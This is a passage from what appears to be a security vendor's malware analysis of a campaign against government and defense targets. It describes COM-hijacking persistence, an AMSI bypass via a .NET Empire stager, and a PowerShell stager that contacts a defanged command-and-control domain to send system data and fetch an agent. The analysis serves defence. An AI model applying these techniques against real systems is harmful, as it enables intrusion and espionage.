exit.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised16.png) **Figure 16. Process name check**\n\nNext, the malware will try to find the file \u201cEhStorShell.dll\u201d in the System32 folder and load it. With this, the malware makes sure that the original \u201cEhStorShell.dll\u201d file is loaded into the explorer.exe context.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised17.png) **Figure 17. Loading EhStorShell.dll library**\n\nThe previous operation is important because the follow-up malware will override the CLSID \u201c{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\u201d to gain persistence in the victims\u2019 system, performing a COM Hijacking technique. The aforementioned CLSID corresponds to the \u201cEnhanced Storage Shell Extension DLL\u201d and is handled by the file \u201cEhStorShell.dll\u201d.\n\nComing up next, the malware will load, initialize and start the .NET CLR Runtime, XOR decrypt the .NET next stage payload and load it into memory. Lastly, it will execute the file using the .NET Runtime.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised18.png) **Figure 18. Decryption of next stage malware**\n\n#### Fifth Stage \u2013 Empire PowerShell C# Stager\n\nThe fifth stage is a .NET executable named Service.exe which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (console) Intel 80386 32-bit \n---|--- \nFile size | 34.00 KB \nMD5 | 3b27fe7b346e3dabd08e618c9674e007 \nSHA-256 | d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n \nThis sample is an Empire PowerShell C# Stager whose main goal is to create an instance of a PowerShell object, decrypt the embedded PowerShell script using XOR operations and decode it with Base64 before finally executing the payload with the Invoke function.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised19.png) **Figure 19. Fifth stage code**\n\nThe reason behind using a .NET executable to load and execute PowerShell code is to bypass security measures like AMSI, allowing execution from a process that shouldn\u2019t allow it.\n\n#### Sixth Stage \u2013 Empire HTTP PowerShell Stager\n\nThe last stage is a PowerShell script, specifically an Empire HTTP Stager, which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | Powershell script \n---|--- \nFile size | 6.00 KB \nMD5 | a81fab5cf0c2a1c66e50184c38283e0e \nSHA-256 | da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n \nAs we mentioned earlier, this is the last stage of the multi-stage attack and is an HTTP stager highly obfuscated using the Invoke-Obfuscation script from Empire to make analysis difficult.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised20.png) **Figure 20. Obfuscated PowerShell script**\n\nThe main functionality of the script is to contact hxxp://wordkeyvpload[.]org/index[.]jsp to send the initial information about the system and connect to the URL hxxp://wordkeyvpload[.]org/index[.]php to download the encrypted Empire agent, decrypt it with AES-256 and execute it. \n\n#### Timeline of Events\n\nBased on all the activities monitored and analyzed, we provide the following timeline of events:\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised21.png) **Figure 21. Timeline of the campaign**\n\n#### Targeting\n\nOne of the lure documents we mentioned before (named \u201cparliament_rew.xlsx\u201d) might have been aimed for targeting government employees.\n\nBesides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name \u201cMissions Budget.xlsx\u201d contained the text \u201cMilitary and civilian missions and operations\u201d and the budgets in dollars for the military operations in some countries for the years 2022 and 2023.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised22.png) **Figure 22. Lure document targeting the defense sector**\n\nMoreover, from our telemetry we also have observed that Poland and other Eastern European countries were of interest to the actors behind this campaign.\n\nThe complete victimology of the actors is unknown, but the lure documents we have seen show its activities are centered in specific regions and industries. Based on the names, the content of the malicious Excel files and our telemetry, targeting countries in Western Asia and Eastern Europe and the mos